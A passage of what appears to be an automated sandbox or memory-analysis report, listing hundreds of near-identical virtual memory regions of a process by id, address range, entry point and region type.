0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6022 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6025 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6026 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6027 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6028 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6029 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6035 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6164 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6165 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6166 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6167 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6168 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6169 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6172 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6203 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6212 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6213 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6216 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6217 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6218 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6223 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6224 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6225 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6226 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6227 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6228 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6229 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6230 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6231 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6232 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6235 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6263 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6264 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6265 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6266 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6267 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6268 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6375 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6376 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6377 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6378 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6379 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6380 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6381 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6382 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6383 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6384 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6385 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6386 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6387 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6388 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6390 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6391 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6392 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6393 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6395 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6397 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6417 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6418 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6419 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6426 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" 